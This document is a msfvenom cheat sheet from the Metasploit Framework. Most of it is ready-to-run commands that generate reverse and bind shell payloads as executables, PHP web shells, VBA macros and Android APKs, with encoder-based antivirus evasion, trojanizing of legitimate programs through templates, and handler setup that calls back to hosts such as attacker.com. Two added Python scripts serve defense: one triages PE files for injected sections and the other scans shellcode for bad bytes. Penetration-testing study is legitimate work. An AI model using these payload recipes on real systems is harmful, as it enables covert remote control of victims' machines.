# Msfvenom

Msfvenom is the payload generator and encoder from the Metasploit Framework. It creates custom shellcode, executables, and encoded payloads for target systems.

## Installation

### Included with Metasploit

```bash
# Install Metasploit Framework
sudo apt install metasploit-framework

# Or build from source (install the Ruby dependencies with bundler before the first run)
git clone https://github.com/rapid7/metasploit-framework.git
cd metasploit-framework
bundle install
./msfvenom

# Verify
msfvenom --version
msfvenom -l payloads | head
```

### Windows Installation

```bash
# Download Metasploit
# https://www.metasploit.com/download
# Use from Windows terminal
msfvenom --help
```

## Basic Syntax

```bash
msfvenom -p <payload> -f <format> [OPTIONS]

# List all payloads
msfvenom -l payloads

# List formats
msfvenom -l formats

# List encoders
msfvenom -l encoders

# Show payload options
msfvenom -p windows/meterpreter/reverse_tcp --list-options
```
## Common Payloads

### Windows Payloads

```bash
# Reverse shell (TCP); windows/meterpreter/* is 32-bit, use windows/x64/meterpreter/* for 64-bit targets
msfvenom -p windows/meterpreter/reverse_tcp LHOST=192.168.1.10 LPORT=4444 -f exe -o shell.exe

# Bind shell
msfvenom -p windows/meterpreter/bind_tcp LPORT=4444 -f exe -o shell.exe

# Reverse HTTPS
msfvenom -p windows/meterpreter/reverse_https LHOST=192.168.1.10 LPORT=443 -f exe -o shell.exe

# Staged payload (smaller; the stager fetches the rest from the handler)
msfvenom -p windows/meterpreter/reverse_tcp LHOST=192.168.1.10 LPORT=4444 -f exe -o shell.exe

# Non-staged payload (complete shellcode in one file)
msfvenom -p windows/shell_reverse_tcp LHOST=192.168.1.10 LPORT=4444 -f exe -o shell.exe
```

### Linux Payloads

```bash
# Reverse shell (x86)
msfvenom -p linux/x86/meterpreter/reverse_tcp LHOST=192.168.1.10 LPORT=4444 -f elf -o shell

# Reverse shell (x64)
msfvenom -p linux/x64/meterpreter/reverse_tcp LHOST=192.168.1.10 LPORT=4444 -f elf -o shell

# Bind shell
msfvenom -p linux/x86/meterpreter/bind_tcp LPORT=4444 -f elf -o shell

# Make executable and run
chmod +x shell
./shell
```

### MacOS Payloads

```bash
# Reverse shell (Intel)
msfvenom -p osx/x64/shell_reverse_tcp LHOST=192.168.1.10 LPORT=4444 -f macho -o shell

# Meterpreter
msfvenom -p osx/x64/meterpreter/reverse_tcp LHOST=192.168.1.10 LPORT=4444 -f macho -o shell
```

### Script Payloads

```bash
# PHP reverse shell
msfvenom -p php/meterpreter/reverse_tcp LHOST=192.168.1.10 LPORT=4444 -f raw -o shell.php

# Python reverse shell
msfvenom -p python/meterpreter/reverse_tcp LHOST=192.168.1.10 LPORT=4444 -f raw -o shell.py

# Ruby reverse shell
msfvenom -p ruby/meterpreter/reverse_tcp LHOST=192.168.1.10 LPORT=4444 -f raw -o shell.rb

# Perl reverse shell
msfvenom -p perl/meterpreter/reverse_tcp LHOST=192.168.1.10 LPORT=4444 -f raw -o shell.pl

# Bash reverse shell
msfvenom -p cmd/unix/reverse_bash LHOST=192.168.1.10 LPORT=4444 -f raw -o shell.sh
```
## Output Formats

| Format | Extension | Use Case |
|---|---|---|
| exe | .exe | Windows executable |
| elf | .elf | Linux binary |
| macho | .macho | MacOS binary |
| apk | .apk | Android application |
| asp | .asp | Active Server Pages |
| aspx | .aspx | ASP.NET |
| war | .war | Java Web App |
| jar | .jar | Java Archive |
| raw | .bin | Raw shellcode |
| c | .c | C source code |
| python | .py | Python code |
| bash | .sh | Bash script |
| perl | .pl | Perl script |
| ruby | .rb | Ruby script |
| php | .php | PHP code |
| hex | .txt | Hexadecimal |
| vba | .vba | VBA macro |
## Encoding & Obfuscation

### Basic Encoding

```bash
# Encode payload
msfvenom -p windows/meterpreter/reverse_tcp LHOST=192.168.1.10 LPORT=4444 \
  -e x86/shikata_ga_nai -f exe -o shell.exe

# Multiple encode passes (-i = number of iterations)
msfvenom -p windows/meterpreter/reverse_tcp LHOST=192.168.1.10 LPORT=4444 \
  -e x86/shikata_ga_nai -i 5 -f exe -o shell.exe

# Different encoder
msfvenom -p windows/meterpreter/reverse_tcp LHOST=192.168.1.10 LPORT=4444 \
  -e x86/jmp_call_additive -f exe -o shell.exe
```

### Encoder Options

```bash
# List available encoders
msfvenom -l encoders

# Show encoder options
msfvenom --list-options -e x86/shikata_ga_nai

# Custom encoder: confirm the name exists in `msfvenom -l encoders` on your install
msfvenom -p windows/meterpreter/reverse_tcp LHOST=192.168.1.10 LPORT=4444 \
  -e x86/polymorphic_engine -i 10 -f exe -o shell.exe
```
## Advanced Techniques

### Staging vs Non-Staging

```bash
# Staged (two-stage, smaller file size)
msfvenom -p windows/meterpreter/reverse_tcp LHOST=192.168.1.10 LPORT=4444 -f exe -o staged.exe

# Non-staged (complete payload, larger)
msfvenom -p windows/shell_reverse_tcp LHOST=192.168.1.10 LPORT=4444 -f exe -o nonstaged.exe

# Check size difference (separate output names, otherwise the second file overwrites the first)
ls -lh staged.exe nonstaged.exe
```

### Custom Options

```bash
# List payload options
msfvenom -p windows/meterpreter/reverse_tcp --list-options

# Set custom options
msfvenom -p windows/meterpreter/reverse_tcp \
  LHOST=192.168.1.10 \
  LPORT=4444 \
  DisablePayloadHandler=true \
  -f exe -o shell.exe
```

### Template Injection

```bash
# Use existing EXE as template (stealth)
msfvenom -p windows/meterpreter/reverse_tcp LHOST=192.168.1.10 LPORT=4444 \
  -f exe -x /path/to/legitimate.exe -o shell.exe

# Keep template behaviour (-k runs the payload in a new thread and then continues with the original program)
msfvenom -p windows/meterpreter/reverse_tcp LHOST=192.168.1.10 LPORT=4444 \
  -f exe -x calculator.exe -k -o shell.exe
```
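The flip side of template injection is triage: a file that claims to be a known program but carries an extra section is worth a second look. The script below is an added example, not code from this cheat sheet or from Metasploit. It walks the PE section table with a minimal hand-written parser (no `pefile` dependency) and flags sections that are readable, writable and executable at once (RWX), a combination that normally built binaries rarely need and that injected code often requires. The sample image it builds is constructed for the demo and is not a real program; `.newsec` is an assumed name, not what any tool actually writes.

```python
"""Heuristic triage of a Windows PE file: list the section table and flag RWX sections.

Added example (not part of the msfvenom cheat sheet or of Metasploit).
"""
import struct
import sys

IMAGE_SCN_CNT_CODE = 0x00000020
IMAGE_SCN_MEM_EXECUTE = 0x20000000
IMAGE_SCN_MEM_READ = 0x40000000
IMAGE_SCN_MEM_WRITE = 0x80000000
RWX = IMAGE_SCN_MEM_EXECUTE | IMAGE_SCN_MEM_READ | IMAGE_SCN_MEM_WRITE


def parse_sections(data: bytes) -> list:
    """Return the PE section headers as dicts (name, vaddr, vsize, rawptr, rawsize, characteristics)."""
    if data[:2] != b"MZ":
        raise ValueError("not a DOS/PE image (missing MZ signature)")
    e_lfanew = struct.unpack_from("<I", data, 0x3C)[0]
    if data[e_lfanew:e_lfanew + 4] != b"PE\0\0":
        raise ValueError("PE signature not found at e_lfanew")
    coff = e_lfanew + 4                                   # IMAGE_FILE_HEADER, 20 bytes
    num_sections = struct.unpack_from("<H", data, coff + 2)[0]
    size_of_optional = struct.unpack_from("<H", data, coff + 16)[0]
    table = coff + 20 + size_of_optional                  # section table follows the optional header
    sections = []
    for i in range(num_sections):
        off = table + 40 * i                              # IMAGE_SECTION_HEADER is 40 bytes
        name = data[off:off + 8].rstrip(b"\0").decode("ascii", "replace")
        vsize, vaddr, rawsize, rawptr = struct.unpack_from("<IIII", data, off + 8)
        characteristics = struct.unpack_from("<I", data, off + 36)[0]
        sections.append({"name": name, "vaddr": vaddr, "vsize": vsize,
                         "rawptr": rawptr, "rawsize": rawsize,
                         "characteristics": characteristics})
    return sections


def rwx_sections(data: bytes) -> list:
    """Names of sections whose characteristics include READ, WRITE and EXECUTE together."""
    return [s["name"] for s in parse_sections(data) if s["characteristics"] & RWX == RWX]


def build_sample_pe() -> bytes:
    """Constructed minimal PE32 image: a normal .text section plus an added RWX section.

    Only the headers are meaningful; the optional header is zero-filled because the
    section-table parser never reads it.
    """
    dos = bytearray(64)
    dos[:2] = b"MZ"
    struct.pack_into("<I", dos, 0x3C, 64)                 # e_lfanew: PE header right after the DOS header
    optional = bytes(224)                                 # PE32 optional header size
    coff = struct.pack("<HHIIIHH", 0x14C, 2, 0, 0, 0, len(optional), 0x0102)

    def section(name: bytes, vaddr: int, size: int, flags: int) -> bytes:
        # Name, VirtualSize, VirtualAddress, SizeOfRawData, PointerToRawData,
        # PointerToRelocations, PointerToLinenumbers, NumberOfRelocations,
        # NumberOfLinenumbers, Characteristics
        return struct.pack("<8sIIIIIIHHI", name, size, vaddr, size, 0x400, 0, 0, 0, 0, flags)

    text = section(b".text", 0x1000, 0x200,
                   IMAGE_SCN_CNT_CODE | IMAGE_SCN_MEM_EXECUTE | IMAGE_SCN_MEM_READ)
    added = section(b".newsec", 0x2000, 0x300, IMAGE_SCN_CNT_CODE | RWX)   # assumed name
    return bytes(dos) + b"PE\0\0" + coff + optional + text + added


def report(data: bytes) -> str:
    """Human-readable section listing with RWX sections marked."""
    lines = []
    for s in parse_sections(data):
        mark = "  <-- RWX, inspect" if s["characteristics"] & RWX == RWX else ""
        lines.append(f"{s['name']:<8} va=0x{s['vaddr']:08x} raw=0x{s['rawsize']:x} "
                     f"chars=0x{s['characteristics']:08x}{mark}")
    return "\n".join(lines)


if __name__ == "__main__":
    # Pass a file path to inspect a real binary; without one the constructed sample is used.
    blob = open(sys.argv[1], "rb").read() if len(sys.argv) > 1 else build_sample_pe()
    print(report(blob))
```

An RWX section is a heuristic, not proof: some packers and legitimate runtimes use them too, so treat a hit as a reason to compare the file's hash and section layout against a known-good copy of the program it claims to be.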
## Practical Examples

### Windows Reverse Shell

```bash
# Create payload
msfvenom -p windows/meterpreter/reverse_tcp \
  LHOST=192.168.1.10 \
  LPORT=4444 \
  -e x86/shikata_ga_nai \
  -i 3 \
  -f exe \
  -o payload.exe
```

```
# Create handler in Metasploit (msfconsole)
use exploit/multi/handler
set PAYLOAD windows/meterpreter/reverse_tcp
set LHOST 192.168.1.10
set LPORT 4444
run
```

### Linux Payload with Encoder

```bash
# Create payload
msfvenom -p linux/x86/meterpreter/reverse_tcp \
  LHOST=192.168.1.10 \
  LPORT=4444 \
  -e x86/shikata_ga_nai \
  -i 5 \
  -f elf \
  -o payload

# Make executable
chmod +x payload

# Run payload
./payload
```

### PHP Web Shell

```bash
# Create PHP payload
msfvenom -p php/meterpreter/reverse_tcp \
  LHOST=192.168.1.10 \
  LPORT=4444 \
  -f raw -o shell.php

# Upload to web server
# Then access via browser to trigger
```

```
# Setup handler (msfconsole)
use exploit/multi/handler
set PAYLOAD php/meterpreter/reverse_tcp
set LHOST 192.168.1.10
set LPORT 4444
run
```

### Word/Office Macros

```bash
# Create VBA macro payload
msfvenom -p windows/meterpreter/reverse_tcp \
  LHOST=192.168.1.10 \
  LPORT=4444 \
  -f vba -o payload.vba

# Manually insert into Office document
# Use tools like Macro-Pack for automated insertion
```

### Android APK

```bash
# Create APK payload
msfvenom -p android/meterpreter/reverse_tcp \
  LHOST=192.168.1.10 \
  LPORT=4444 \
  -o payload.apk

# Sign APK (optional)
# jarsigner -verbose -sigalg MD5withRSA -digestalg SHA1 \
#   -keystore my-release-key.keystore payload.apk my-key-alias
```
## Shellcode Generation

### Raw Shellcode

```bash
# Generate raw shellcode
msfvenom -p windows/meterpreter/reverse_tcp \
  LHOST=192.168.1.10 \
  LPORT=4444 \
  -f raw -o shellcode.bin

# Output as hex
msfvenom -p windows/meterpreter/reverse_tcp \
  LHOST=192.168.1.10 \
  LPORT=4444 \
  -f hex -o shellcode.hex

# Output as C array
msfvenom -p windows/meterpreter/reverse_tcp \
  LHOST=192.168.1.10 \
  LPORT=4444 \
  -f c -o shellcode.c
```

### Bad Characters

```bash
# Generate avoiding bad characters (null bytes, etc.)
msfvenom -p windows/meterpreter/reverse_tcp \
  LHOST=192.168.1.10 \
  LPORT=4444 \
  -b '\x00\x0a\x0d' \
  -f raw -o shellcode.bin
```
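Whether you are confirming that a `-b` run really left the listed bytes out, or you received a `-f c` / `-f hex` blob in a report and want it back as bytes with a hash, the same small parser serves both. It is an added example, not code from this cheat sheet or from Metasploit: it collects the `\xNN` escapes from `-f c` output, decodes `-f hex` output, and scans the result against a bad-character list written in the same `\x00\x0a\x0d` notation that `-b` takes. The sample outputs are constructed byte strings, not real payload code.

```python
"""Turn msfvenom's text formats (-f c, -f hex) back into bytes and scan for bad characters.

Added example (not part of the msfvenom cheat sheet or of Metasploit).
"""
import hashlib
import re

# Constructed sample in the layout of `-f c` output; offsets 2 and 4 hold 0x00 and 0x0a on purpose.
SAMPLE_C_OUTPUT = '''unsigned char buf[] =
"\\x41\\x42\\x00\\x43"
"\\x0a\\x44";
'''

# The same constructed bytes in the layout of `-f hex` output.
SAMPLE_HEX_OUTPUT = "414200430a44"

_ESCAPE = re.compile(r"\\x([0-9a-fA-F]{2})")


def parse_c_array(text: str) -> bytes:
    """Collect every \\xNN escape from `-f c` output (the quoted string literals) into bytes."""
    return bytes(int(h, 16) for h in _ESCAPE.findall(text))


def parse_hex(text: str) -> bytes:
    """Decode `-f hex` output (one long hex string, possibly wrapped across lines)."""
    return bytes.fromhex("".join(text.split()))


def parse_badchars(spec: str) -> set:
    """Parse a -b style list such as '\\x00\\x0a\\x0d' into a set of byte values."""
    return {int(h, 16) for h in _ESCAPE.findall(spec)}


def find_bad_bytes(blob: bytes, bad: set) -> list:
    """Return (offset, value) for every byte of the blob that is in the bad set."""
    return [(i, b) for i, b in enumerate(blob) if b in bad]


def summarize(blob: bytes, bad: set) -> dict:
    """Length, SHA-256 and bad-byte hits for a blob; 'clean' is True when no bad byte occurs."""
    hits = find_bad_bytes(blob, bad)
    return {
        "length": len(blob),
        "sha256": hashlib.sha256(blob).hexdigest(),
        "bad_bytes": hits,
        "clean": not hits,
    }


if __name__ == "__main__":
    bad = parse_badchars(r"\x00\x0a\x0d")
    blob = parse_c_array(SAMPLE_C_OUTPUT)
    assert blob == parse_hex(SAMPLE_HEX_OUTPUT)
    result = summarize(blob, bad)
    print(f"{result['length']} bytes, sha256={result['sha256']}")
    for offset, value in result["bad_bytes"]:
        print(f"  bad byte 0x{value:02x} at offset {offset}")
    print("clean" if result["clean"] else "NOT clean")
```

Feed it the contents of `shellcode.c` or `shellcode.hex` from the commands above and the same `-b` string: a non-empty `bad_bytes` list after an encoded run means the encoder could not satisfy the constraint and msfvenom should have told you so.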
## Handlers for Payloads

### Multi-Handler Setup

```
# In msfconsole
use exploit/multi/handler
set PAYLOAD windows/meterpreter/reverse_tcp
set LHOST 192.168.1.10
set LPORT 4444
set DisablePayloadHandler false
run
```

### Handle Multiple Connections

```
# Accept multiple connections (keep the handler listening as a background job)
use exploit/multi/handler
set PAYLOAD windows/meterpreter/reverse_tcp
set LHOST 0.0.0.0
set LPORT 4444
set ExitOnSession false
run -j
```
## Troubleshooting

### Antivirus Evasion

```bash
# Use polymorphic encoder with many iterations
# Note: encoders exist to avoid bad characters, not to evade AV; the shikata_ga_nai
# decoder stub is widely signatured, so expect detection regardless of iteration count
msfvenom -p windows/meterpreter/reverse_tcp \
  LHOST=192.168.1.10 \
  LPORT=4444 \
  -e x86/shikata_ga_nai \
  -i 10 \
  -f exe -o payload.exe

# Use template injection
msfvenom -p windows/meterpreter/reverse_tcp \
  LHOST=192.168.1.10 \
  LPORT=4444 \
  -f exe -x notepad.exe -k -o payload.exe
```

### Firewall Evasion

```bash
# Use HTTPS instead of HTTP
msfvenom -p windows/meterpreter/reverse_https \
  LHOST=192.168.1.10 \
  LPORT=443 \
  -f exe -o payload.exe

# Resolve LHOST by hostname (reverse_tcp_dns) and connect on a commonly allowed port
msfvenom -p windows/meterpreter/reverse_tcp_dns \
  LHOST=attacker.com \
  LPORT=53 \
  -f exe -o payload.exe
```
## Security Notes

- Only generate payloads for authorized testing
- Test payloads in isolated environments
- Document all payload generation
- Clean up payloads after testing
- Comply with laws and regulations
- Implement proper operational security (OPSEC)
- Use appropriate encryption for payload delivery

Last updated: 2025-03-30